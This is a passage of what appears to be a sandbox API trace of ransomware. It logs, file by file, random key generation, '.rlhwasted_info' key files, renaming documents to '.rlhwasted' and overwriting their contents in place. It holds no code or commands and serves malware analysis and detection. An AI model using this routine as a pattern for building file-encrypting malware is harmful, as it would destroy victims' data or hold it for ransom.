HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\SeVp.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\sevp.pptx.rlhwasted")) returned 1 [0189.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\7UmuD7J\\SeVp.pptx.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\7umud7j\\sevp.pptx.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0189.834] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0189.834] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xa2ff [0189.834] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa2ff) returned 0x6a0000 [0189.834] CloseHandle (hObject=0x104) returned 1 [0189.837] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0189.838] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6fb020 | out: pbBuffer=0x6fb020) returned 1 [0189.838] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.838] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0189.839] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0189.839] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.858] SetEndOfFile (hFile=0x10c) returned 1 [0189.927] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0189.927] CloseHandle (hObject=0x10c) returned 1 [0189.931] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0189.931] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fe158 | out: hHeap=0x6b0000) returned 1 [0189.931] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0189.932] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0189.933] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.933] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\AMKDqMh8xRiiO_pcCci.ppt") returned 85 [0189.933] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b4) returned 0x6d4580 [0189.933] lstrcpyW (in: lpString1=0x6d462a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0189.933] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0189.933] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0189.934] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0189.934] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\AMKDqMh8xRiiO_pcCci.ppt.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\amkdqmh8xriio_pccci.ppt.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0189.934] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0189.935] SetEndOfFile (hFile=0x10c) returned 1 [0189.936] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.936] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0189.936] lstrcpyW (in: lpString1=0x6d462a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0189.936] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\AMKDqMh8xRiiO_pcCci.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\amkdqmh8xriio_pccci.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\AMKDqMh8xRiiO_pcCci.ppt.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\amkdqmh8xriio_pccci.ppt.rlhwasted")) returned 1 [0189.937] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\AMKDqMh8xRiiO_pcCci.ppt.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\amkdqmh8xriio_pccci.ppt.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0189.937] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0189.937] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x169df [0189.937] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x169df) returned 0x12b0000 [0189.938] CloseHandle (hObject=0x104) returned 1 [0189.944] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0189.945] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0189.945] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.945] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0189.946] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0189.946] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0189.981] SetEndOfFile (hFile=0x10c) returned 1 [0190.189] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0190.189] CloseHandle (hObject=0x10c) returned 1 [0190.191] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0190.191] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fce48 | out: hHeap=0x6b0000) returned 1 [0190.191] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0190.192] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0190.192] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\i8uRcMGrt.ots") returned 75 [0190.192] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a0) returned 0x6d4580 [0190.193] lstrcpyW (in: lpString1=0x6d4616, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0190.193] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0190.193] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0190.194] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0190.194] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\i8uRcMGrt.ots.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\i8urcmgrt.ots.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0190.194] WriteFile (in: hFile=0x10c, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0190.195] SetEndOfFile (hFile=0x10c) returned 1 [0190.195] SetFilePointer (in: hFile=0x10c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.195] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.195] lstrcpyW (in: lpString1=0x6d4616, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.196] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\i8uRcMGrt.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\i8urcmgrt.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\i8uRcMGrt.ots.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\i8urcmgrt.ots.rlhwasted")) returned 1 [0190.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\i8uRcMGrt.ots.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\i8urcmgrt.ots.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0190.196] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0190.197] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x16e60 [0190.197] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16e60) returned 0xb00000 [0190.197] CloseHandle (hObject=0x124) returned 1 [0190.202] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0190.203] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6fcd88 | out: pbBuffer=0x6fcd88) returned 1 [0190.203] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.203] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0190.204] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0190.204] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.212] SetEndOfFile (hFile=0x10c) returned 1 [0190.215] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.215] CloseHandle (hObject=0x10c) returned 1 [0190.314] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0190.314] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fcf50 | out: hHeap=0x6b0000) returned 1 [0190.314] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0190.315] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0190.315] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.315] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\SPlRkW-oQK.ods") returned 76 [0190.315] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6d4580 [0190.315] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0190.315] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ec7b8 [0190.315] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0190.316] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ec7b8 | out: pbBuffer=0x6ec7b8) returned 1 [0190.316] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\SPlRkW-oQK.ods.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\splrkw-oqk.ods.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0190.317] WriteFile (in: hFile=0x110, lpBuffer=0x6ec7b8*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ec7b8*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0190.318] SetEndOfFile (hFile=0x110) returned 1 [0190.318] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.318] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0190.318] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.319] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\SPlRkW-oQK.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\splrkw-oqk.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\SPlRkW-oQK.ods.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\splrkw-oqk.ods.rlhwasted")) returned 1 [0190.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jNlkg4MhY3hbzLiVX\\SPlRkW-oQK.ods.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jnlkg4mhy3hbzlivx\\splrkw-oqk.ods.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0190.320] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0190.320] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x1484e [0190.320] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1484e) returned 0xb00000 [0190.320] CloseHandle (hObject=0x124) returned 1 [0190.332] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0190.333] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0190.333] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.333] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0190.334] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0190.334] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.344] SetEndOfFile (hFile=0x110) returned 1 [0190.423] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0190.423] CloseHandle (hObject=0x110) returned 1 [0190.572] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0190.572] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6fe250 | out: hHeap=0x6b0000) returned 1 [0190.573] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0190.584] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0190.590] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kOtl382XfLTV.csv") returned 60 [0190.591] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x282) returned 0x6d4580 [0190.591] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0190.591] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0190.591] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x710fe8) returned 1 [0190.592] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0190.592] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0190.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kOtl382XfLTV.csv.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kotl382xfltv.csv.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0190.593] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0190.832] SetEndOfFile (hFile=0x110) returned 1 [0190.832] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.832] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.832] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.832] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kOtl382XfLTV.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kotl382xfltv.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kOtl382XfLTV.csv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kotl382xfltv.csv.rlhwasted")) returned 1 [0190.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kOtl382XfLTV.csv.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kotl382xfltv.csv.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0190.835] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0190.835] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x17ec6 [0190.835] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17ec6) returned 0xb00000 [0190.835] CloseHandle (hObject=0x10c) returned 1 [0190.847] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x710fe8) returned 1 [0190.848] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6e7b28 | out: pbBuffer=0x6e7b28) returned 1 [0190.848] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0190.848] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x710fe8) returned 1 [0190.849] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0190.849] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0190.884] SetEndOfFile (hFile=0x110) returned 1 [0190.887] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.887] CloseHandle (hObject=0x110) returned 1 [0190.910] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0190.910] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f8ff0 | out: hHeap=0x6b0000) returned 1 [0190.910] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x710fe8) returned 1 [0190.912] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0190.912] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0190.912] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nKOCE-puVSIk.odt") returned 60 [0190.912] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x282) returned 0x6d4580 [0190.912] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0190.912] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0190.912] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0190.924] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0190.924] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0190.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nKOCE-puVSIk.odt.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nkoce-puvsik.odt.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0190.928] WriteFile (in: hFile=0x110, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0190.932] SetEndOfFile (hFile=0x110) returned 1 [0190.932] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.932] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0190.932] lstrcpyW (in: lpString1=0x6d45f8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0190.932] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nKOCE-puVSIk.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nkoce-puvsik.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nKOCE-puVSIk.odt.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nkoce-puvsik.odt.rlhwasted")) returned 1 [0190.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nKOCE-puVSIk.odt.rlhwasted" (normalized: 